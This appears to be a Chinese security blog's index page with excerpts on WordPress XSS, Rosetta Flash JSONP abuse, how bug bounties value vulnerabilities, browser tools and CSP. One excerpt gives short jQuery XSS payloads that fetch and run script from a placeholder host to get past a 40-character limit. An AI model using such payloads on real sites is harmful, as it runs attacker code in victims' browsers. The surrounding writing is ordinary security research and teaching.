WordPress 双连发存储通杀 XSS 就这样爆爆爆!可惜之余,说下:

  1. 这种字符集不一致导致的问题会是个普遍问题,不仅是导致 XSS;
  2. 要完美通杀或 IE 通杀得理解 CSS 导致的一些本质特性;
  3. 截断问题真是个可爱问题;
  4. WordPress 的过滤机制真可爱;
  5. 我们团队的应急真赞;

具体链接:
https://cedricvb.be/post/wordpress-stored-xss-vulnerability-4-1-2/

Continue reading

博客升级了下,我把一个月前的这篇文章转篇过来。


这次我在 QCon 上海做了《程序员与黑客》的演讲,得到很多认可,这点很欣慰。不过演讲超时20分钟,这点不应该。很多同学意犹未尽,我也是。

这篇文章我说说,我为什么要讲这个议题。

Continue reading

平时工作过于忙碌,技术的敏感度稍显滞后,好在隐隐感觉黑哥与小熊在群里提到的Flash 0day特性(CVE-2014-4671)具备非常大的价值,于是保存了笔记,晚上抽空断断续续研究了下,才意识到这个0day的价值。

原文链接:
http://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/

乌云昨天出了个翻译:
http://drops.wooyun.org/tips/2554

Continue reading

最近一直在知乎游荡,假期没啥事。
看到有同学@我,问:

大家来研究探讨一下,网页游戏攻防技术。必定,这个话题很敏感。目前,网页游戏已经很多了,会不会被黑产盯上?网页游戏会不会被黑掉,数据库会不会泄露?

我的回答如下:

这个得游戏安全同学来回答更好,不过我说下我的一些hacking心得吧。

Continue reading

最近一段时间,知道创宇的wsl小伙伴们发出了一个疑问:

我给tsrc提交的漏洞和xxx是一样的啊,为什么我的分少?

这个小伙伴的疑问的问题在于,没搞清楚漏洞的价值,漏洞价值体现在漏洞影响上,几个维度:
1. 漏洞本身的危害,比如一般情况下SQL的危害大于XSS;
2. 漏洞的易利用程度,一步搞定目标?还是要结合社工等,N步搞定目标,这个决定了成功率;
3. 目标群体大小,QQ群体规模>企业QQ;
4. 目标本身的价值,一般情况下,企业QQ>普通QQ,如你是要搞Q币,那就是普通QQ>企业QQ;
5. 社会影响面,如果被炒作了……这点可以忽略,要不然太复杂了;

Continue reading

后台灰盒+exp被限制40字符+script等标签被过滤。

很多人祭出0day bypass,没必要。先分析场景。最爽的是我看到场景使用了jquery,在昨天的一个攻击场景下,我推测那后台用jquery是必然的。

于是简短强悍的exp如:

1. eval($.get('//xxxx.com'))
2. $.getScript('//xxx.com') // 这个最牛逼,我当时没意识到,pw实战发现

思想是:攻击得原生态,依赖场景,这个思想在我们那本《Web前端黑客技术揭秘》第七章有鲜活说法。

大家举一反三吧。

原文发到我的知乎专栏了:http://zhuanlan.zhihu.com/evilcos/19578244。by 余弦 2013不断扩充扩充,想到哪扩充到哪。

update: 2013/10/10

Firefox下

  1. Firebug,调试js,HTTP请求响应观察,Cookie,DOM树观察等;
  2. GreaseMonkey,自己改了个Cookie修改脚本,其他同学可以用这款:Original Cookie Injector for Greasemonkey
  3. Noscript,进行一些js的阻断;
  4. AutoProxy,翻墙必备;

Continue reading

http://threatpost.com/csp-1-0-added-to-firefox-to-block-xss-attacks/

X-Content-Security-Policy头会变为:Content-Security-Policy。

我没测试,不过据说Firefox、Chrome、IE10(沙箱模式)都支持了这个头。CSP1.0 还支持内嵌的样式的屏蔽,这些目的都是为了防御XSS。

我们的《Web前端黑客技术揭秘》最后一章有详细说明(http://vdisk.weibo.com/s/GDqYZ开放),并认为CSP最终会成为XSS的终结者。不过这需要那些网站配合浏览器的CSP策略了,不仅能保证代码编写规范,也能保证前端安全性。

:)